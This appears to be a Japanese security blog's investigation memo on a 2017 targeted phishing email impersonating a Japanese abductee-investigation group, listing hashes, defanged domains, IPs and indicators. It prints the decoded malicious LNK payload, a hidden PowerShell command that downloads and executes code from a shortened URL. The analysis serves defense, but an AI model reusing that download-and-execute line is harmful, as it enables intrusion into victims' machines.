メニュー

特定失踪者問題調査会を装った標的型攻撃メール調査メモ

2017年4月17日 - malware, memo
特定失踪者問題調査会を装った標的型攻撃メール調査メモ

 
2017年2月23日に特定失踪者問題調査会を装った不審なメールが発生しているという注意喚起が代表者の方のブログから出されていました。(魚拓)注意喚起が出されてからかなりの時間が経過していますが、この攻撃に用いられたと思われる添付ファイルを入手しました。

そちらのファイルについて調査を行いましたので、その調査結果を共有します。

 

前述した注意喚起は下図のようなものでした。

上図より得られる情報を下記の通りです。

メール情報
項目名 内容 備考
送信日時 2017年2月20日 時間については不明
送信元メールアドレス 不明
件名 金正男【調査会NEWS2394】(29.2.20)
添付ファイル 金正男 【調査会NEWS2394】(29.2.20).zip 実際の2394号は2月14日付のものである。
本文 不明

 

このメールに添付されていたと考えられるファイルの情報は下記の通りです。 

ファイル情報
項目名 内容 備考
ファイル名 20170220_金正男 【調査会NEWS2394】(29.2.20).zip 注意喚起にあったファイル名と異なるのは、入手時のファイル名であるため
ハッシュ値 MD5: 5db01ea65aa3df2b0b8d6a7d633b85e8
SHA-1: 370a20f3b453a2dbf98f3811a63f2f84523a405e
展開後ファイル名 金正男 【調査会NEWS2394】(29.2.20).lnk

 

展開後のファイルの情報は下記の通りです。 

展開後ファイル情報
項目名 内容 備考
ファイル名 金正男 【調査会NEWS2394】(29.2.20).lnk
ハッシュ値 MD5: 59692B3CAA70D9131C0D71C9230C70E3
SHA-1: B804768BC61E816B4457DE530AE59DF693E8EF75
ダウンロード先ドメイン tokyo-gojp[dot]com
ダウンロード先URL http://images.tokyo-gojp[dot]com/src/image/YDLNxBPSGm.jpg 2017年2月20日から2017年2月22日まで左記URLのサブドメインに割り当てられていたIPアドレスは 192[dot]241.255.61 であった。

上記ファイルをテキストエディタで開いた内容は下図の通りです。

上図の文字列内にあるエンコードされた部分をデコードした結果は以下の通りです。

$2=’-nop -w hidden -exec bypass -c “IEX (New-Object System.N’;$10=’et.Webclient).DownloadString(”https://goo[dot]gl/KwjOFi”)”‘;$2+=$10;if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + “\syswow64\WindowsPowerShell\v1.0\powershell”;iex “& $3 $2”;}else{iex “& powershell $2”;}

上記では、googleの短縮URLが利用されていた為、Google URL Shortenerで確認したところこの短縮URLが作成されたのは2017年2月20日でした。

また、この短縮URLを展開した際のURLに含まれるサブドメインについて調査を行いました。その結果下図のように初めて観測された日付が2017年2月20日であり、22日までIPアドレス「192[dot]241.255.61」が割り当てられていたことが判明しました。

以上のことから短縮URLの作成日、サブドメインに割り当てられたIPアドレスの観測日が注意喚起を出していたブログ内にあった送信日と一致したと言えます。
短縮URLを展開したファイルについてはlnkファイルを実行することでダウンロードされるものですが、調査日現在、ファイルが削除されていたため入手には至りませんでした。しかし、これらの攻撃の手口は、過去に当ブログにもポストした「日本学術振興会を騙った標的型攻撃メール 調査メモ」と同様の手口であるため同じ攻撃者グループによるものと推測されます。前述のブログエントリにて判明したドメインと今回判明したドメインについて調査したところ下図のように参照しているDNSが同じものであることが判明しました。

また、関連性の調査から不審なサブドメイン「fukuoka.tokyo-gojp[dot]com」が存在していたことが確認できました。このサブドメインのIPアドレスの割り当てについては下図の通りで2017年2月22日のみ「185[dot]61.148.130」であったことが確認できました。

以下は、本エントリの調査により判明したインディケータ情報です。

インディケータ情報
属性 内容 備考
FileHash-MD5 5db01ea65aa3df2b0b8d6a7d633b85e8
FileHash-SHA1 370a20f3b453a2dbf98f3811a63f2f84523a405e
FileHash-MD5 59692B3CAA70D9131C0D71C9230C70E3
FileHash-SHA1 B804768BC61E816B4457DE530AE59DF693E8EF75
domain tokyo-gojp[dot]com
hostname images.tokyo-gojp[dot]com
hostname fukuoka.tokyo-gojp[dot]com
URL http://images.tokyo-gojp[dot]com/src/image/YDLNxBPSGm.jpg
IPv4 192[dot]241.255.61
IPv4 185[dot]61.148.130

 

【2017/04/27 追記】
今回の調査のきっかけとなったブログの過去エントリについてウイルスに関するエントリが存在するかの確認を行ったところ、以下のような文面を含む2015年3月23日付けのエントリ魚拓)が存在することが確認できました。

ウィルスメールについて

【調査会NEWS1823】(27.3.23)

 メールニュース送信先の一部の方に次のようなメールが送られています。
——————————-
 本メールは、保険を利用して診察や診療を受けられた方に、医療費のご負担額等をお知らせしています。
 Windows-PCで開けてください。
——————————–
 言うまでもなくこれは調査会から送ったものではありません。添付ファイルが付いている場合は絶対に開かずに直ぐ消去して下さい。

 原因については現在調査中です。ご迷惑をおかけして申しわけありません。

上記内にあるメールの文面は、過去に「医療費通知のお知らせ」という件名で、同名のzipファイルが添付されていた標的型攻撃メールの文面と同様です。

情報共有は以上です。

 
 

【2017/04/27 追記】
調査のきっかけになったブログの過去エントリについて追記
 

【2017/04/17 初版公開】